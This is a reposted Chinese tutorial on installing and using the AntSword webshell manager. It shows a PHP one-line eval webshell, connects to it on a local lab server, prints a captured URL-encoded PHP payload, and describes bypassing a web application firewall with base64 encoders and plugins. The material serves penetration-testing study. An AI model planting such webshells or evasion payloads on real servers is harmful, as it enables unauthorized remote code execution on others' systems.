我的编程空间,编程开发者的网络收藏夹
学习永远不晚

中国蚁剑安装使用教程

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

中国蚁剑安装使用教程

中国蚁剑安装使用教程


大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言


中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

 @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.129/muma.php

在这里插入图片描述

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

在这里插入图片描述

2.2中国蚁剑设置代理

  1. 首先点击设置

在这里插入图片描述

  1. 进行相应的配置

在这里插入图片描述
在这里插入图片描述

  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

在这里插入图片描述

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1Host: 192.168.93.129:80Accept-Encoding: gzip, deflateUser-Agent: antSword/v2.1Content-Type: application/x-www-form-urlencodedContent-Length: 983Connection: close1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

在这里插入图片描述

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

在这里插入图片描述

2.4中国蚁剑其他使用

在这里插入图片描述

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

在这里插入图片描述

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

 @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

在这里插入图片描述

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

在这里插入图片描述

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

在这里插入图片描述

如上所示,点击插件市场,进行插件下载

在这里插入图片描述

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF

来源地址:https://blog.csdn.net/qq_53568983/article/details/129782649

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

中国蚁剑安装使用教程

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

Qt6安装教程(使用国内源)

本文主要介绍了Qt6安装教程(使用国内源),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
2023-02-15

Navicat使用教程及安装教程

Navicat是一个广泛使用的数据库管理工具,可用于管理多种数据库系统,如MySQL、MariaDB、Oracle等。它提供了丰富的功能,使得管理数据库变得更加容易和高效。安装Navicat十分简单,只需下载安装包并按照向导进行操作即可。在
2023-08-16

nvm安装使用教程

文章目录 下载配置安装最新稳定版 node安装指定版本查看版本切换版本删除版本 常见问题安装node后 显示拒绝访问的问题使用cnpm会报错的问题降低cnpm版本npm镜像 下载 NVM for Windows 下
2023-08-30

mysql安装使用教程 绿色版的mysql安装教程

本教程将详细介绍如何安装和使用 mysql 绿色版,一种无需安装即可运行的便携式数据库。mysql 是一种广泛使用的关系型数据库管理系统,因其速度、可靠性和可扩展性而闻名。本教程旨在帮助初学者和有经验的用户快速上手 mysql 绿色版,并可
mysql安装使用教程 绿色版的mysql安装教程
2024-10-17

CocoaPods安装和使用教程

CocoaPods是一个用于管理iOS项目中第三方库的工具。下面是CocoaPods的安装和使用教程:1. 安装CocoaPods- 打开终端(Terminal)应用程序。- 运行以下命令安装CocoaPods:```sudo gem in
2023-08-23

sonar安装及使用教程

Sonar是一个代码质量管理平台,用于分析和管理代码的质量。它可以帮助开发团队发现和解决代码中的潜在问题,提高代码的可读性和可维护性。以下是Sonar的安装和使用教程:1. 下载Sonar首先,从Sonar官方网站(https://www.
2023-09-17

Deepin中安装与使用virtualenv的教程

virtualenv是一个用来创建隔离的python虚拟环境的工具。它可以在一个独立的目录创建自己的python环境,使用virtualenv运行的程序,并不会访问全局的python环境,也不会访问
2022-06-04

使用dos安装mysql教程

本教程提供详细步骤指导,使用 dos 操作系统从头开始安装 mysql 数据库管理系统。涵盖了从下载 mysql 安装程序到配置数据库服务的所有关键步骤。本文还讨论了 mysql 的基本概念,例如数据库、表和索引,以及如何使用 mysql
使用dos安装mysql教程
2024-10-17

编程热搜

目录